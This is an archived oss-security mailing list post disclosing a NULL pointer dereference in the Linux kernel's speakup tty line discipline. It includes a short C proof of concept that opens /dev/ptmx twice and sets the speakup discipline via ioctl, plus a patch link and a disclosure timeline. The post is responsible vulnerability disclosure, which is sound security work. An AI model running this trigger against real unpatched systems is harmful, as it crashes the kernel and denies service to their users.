Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <CAM1BPE6J_heHs_ckMm5u_Pv6Wnssv_3wgiCNBJs+HLQ+4qkC4A@mail.gmail.com>
Date: Thu, 19 Nov 2020 10:46:59 +0800
From: Shisong Qin <qinshisong1205@...il.com>
To: oss-security@...ts.openwall.com
Cc: nopitydays@...il.com
Subject: Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close

Hi,

Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
and set "speakup_tty" to NULL. However, if we open two tty device and use
tiocsetd() to set them as "speakup_tty" and close them in turn, the first
close would set "speakup_tty" to NULL, and in the second close would try to
dereference the "speakup_tty", leading to a NULL-ptr deref crash.

This bug could be reproduced in the longterm 4.19 Linux kernel with
CONFIG_STAGING=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y.
To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
required in config, and here is a simple poc:

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

int main(void) {
    int disc = 0x1a;
    int fd = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd, 0x5423, &disc);
    int fd2 = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd2, 0x5423, &disc);
    return 0;
}

After the process return, it seems the automated calling to release would
trigger the NULL-ptr deref bug.

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=d4122754442799187d5d537a9c039a49a67e57f1

Timeline:
* 2020/11/10 - Vulnerability reported to security@...nel.org
* 2020/11/11 - Vulnerability confirmed, and reported to
linux-distros@...openwall.org.
* 2020/11/19 - Vulnerability opened.

Thanks,
Shisong Qin and Bodong Zhao, Tsinghua University

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.